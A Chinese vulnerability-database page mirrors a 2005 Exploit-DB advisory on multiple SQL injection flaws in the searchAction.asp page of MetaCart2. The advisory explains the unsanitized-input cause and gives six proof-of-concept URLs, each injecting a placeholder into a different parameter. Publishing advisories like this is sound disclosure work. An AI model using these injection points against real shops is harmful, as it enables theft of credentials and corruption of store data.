MetaCart2 – ‘SearchAction.asp’ Multiple SQL Injections

33次阅读
没有评论

MetaCart2 – ‘SearchAction.asp’ Multiple SQL Injections

漏洞ID 1055056 漏洞类型
发布时间 2005-04-26 更新时间 2005-04-26
MetaCart2 - 'SearchAction.asp' Multiple SQL InjectionsCVE编号 N/A
MetaCart2 - 'SearchAction.asp' Multiple SQL InjectionsCNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25543
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13393/info

MetaCart2 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.

An attacker may exploit these issues to manipulate SQL queries to the underlying database. This may facilitate the theft of sensitive information, potentially including authentication credentials, and data corruption. 

http://www.example.com/mcart2sqluk/searchAction.asp?chkText='SQL_INJECTION&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat=1
http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText='SQL_INJECTION&chkPrice=yes&intPrice=all&chkCat=yes&strCat=1
http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice='SQL_INJECTION&intPrice=all&chkCat=yes&strCat=1
http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice='SQL_INJECTION&chkCat=yes&strCat=1
http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat='SQL_INJECTION&strCat=1
http://www.example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat='SQL_INJECTION

相关推荐: Netwin SurgeFTP Malformed Request Denial of Service Vulnerability

Netwin SurgeFTP Malformed Request Denial of Service Vulnerability 漏洞ID 1103424 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 …

正文完
 0